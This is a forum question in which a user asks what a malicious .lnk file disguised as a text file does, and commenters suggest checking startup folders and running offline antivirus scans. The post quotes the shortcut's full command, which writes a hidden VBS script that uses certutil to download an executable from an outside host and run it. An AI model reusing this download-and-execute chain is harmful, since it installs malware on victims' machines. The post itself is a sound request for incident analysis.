1

I received a link file masquerading as a text file. By mistake I had clicked that and suddenly a command prompt opened. Surprised at the unexpected behavior I closed that window. Upon inspecting the file, it had .lnk extension. While normal .lnk file has few byte size, this one was few hundred MB.

Inspecting the details of the .lnk file, it had in the target field the following command

%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?di1708e9xmgN9OFQ=amusers_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"

While the start in field had

"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

Need some help in understanding what does this code fragment do, and if possible how to check if anything bad has happened and how to undo the changes.

Windows 8 system, if any way relevant. Let me know if any other information is needed.

Frash
  • 111
  • 3
  • It looks like an attempt at silently installing a software, and the method makes it suspicious indeed. Go to your startup folder via the "shell:startup" command in the Run box to make sure no program has been added there; also check in the "shell:common startup" folder for good measure and, provided you have admin rights, delete whatever's there that shouldn't be. Then run a complete antivirus scan, preferably on startup (offline mode in Windows Defender, startup scan on Avast, etc...) or via a USB recovery tool like EEK (https://www.emsisoft.com/en/home/emergencykit/). –  May 21 '20 at 06:30
  • I had checked both the places you've mentioned, there was nothing. I tried to check the url it was downloading from, the file looked like lot of junk character. Also as far as I can tell, `ComSpec` is a replacement for `cmd.exe`, any idea what that `CreateObject` does and how? – Frash May 21 '20 at 06:46
  • CreateObject is a VisualBasic Script command, so it can be invoked in a script to create pretty much anything, folder, file, registry entry, you name it. Alone, it doesn't mean or do anything, though, there has to be a string behind it that will name the object that's being created, what it does, where it's going to be stored, etc... ComSpec is used as way of cmd.exe for some internal (as in, "same directory") commands such as "copy", "DIR" (to list directories and their content), "RD" (to remove/delete empty directories), etc... External commands apply to other objects. –  May 21 '20 at 07:30
  • You really should scan your machine with an offline antivirus / antimalware tool as thoroughly as possible (all internal and external drives should be scanned too), to make sure no infection has been perpetrated. –  May 21 '20 at 07:33

0 Answers0